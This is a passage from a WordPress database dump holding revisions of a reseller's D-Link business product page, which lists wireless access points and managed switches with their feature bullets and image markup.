Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Enjoy High-performance Wireless Connectivity</p><p>â€“ Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><p>MU-MIMO with Beamforming</p><p>â€“ Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><p>Multiple Operational Modes</p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ High-speed wireless performance with 300 Mbps wireless signal rates</p><p>â€¢ Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>â€¢ Gigabit Ethernet port with 802.3af Power over Ethernet</p><p>â€¢ Multiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>â€¢ Support Inbuilt Radius server, Network Access protection (NAP)</p><p>â€¢ Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>â€¢ Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 12:34:16','2019-09-25 04:34:16','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3368,1,'2019-09-25 12:34:39','2019-09-25 04:34:39','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"500\" height=\"500\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w\" sizes=\"(max-width: 500px) 100vw, 500px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>â€¢ MU-MIMO with beamforming</p><p>â€¢ Band steering</p><p>â€¢ Gigabit PoE-capable LAN port</p><p>â€¢ AP Array utility support</p><p>â€¢ Free D-Link Central WiFiManager</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>Enjoy High-performance Wireless Connectivity</p><p>â€“ Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><p>MU-MIMO with Beamforming</p><p>â€“ Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><p>Multiple Operational Modes</p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ High-speed wireless performance with 300 Mbps wireless signal rates</p><p>â€¢ Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>â€¢ Gigabit Ethernet port with 802.3af Power over Ethernet</p><p>â€¢ Multiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>â€¢ Support Inbuilt Radius server, Network Access protection (NAP)</p><p>â€¢ Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>â€¢ Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 12:34:39','2019-09-25 04:34:39','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3369,1,'2019-09-25 12:35:06','2019-09-25 04:35:06','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"500\" height=\"500\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png\" alt=\"\" 